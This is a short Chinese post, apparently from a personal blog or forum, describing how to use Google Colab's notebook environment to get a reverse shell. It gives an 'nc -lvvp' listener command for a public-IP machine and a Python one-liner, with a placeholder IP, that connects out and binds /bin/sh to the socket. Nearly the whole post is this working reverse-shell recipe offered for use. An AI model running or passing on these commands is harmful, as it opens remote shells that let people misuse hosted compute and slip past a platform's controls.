今天才看到 colab
这个平台 ,之前确实没仔细研究这是啥
看到是 Jupyter Notebook, 想到了一个用法, 那就是用 python 是反弹一个 shell
-
找个有公网IP 的机器, 执行 `➜ ~ nc -lvvp 2333
-
在 colab 执行
`!python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“xxx.xxx.xxx.xxx”,2333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,“-i”]);’
- 公网机器就可以拿到 shell 了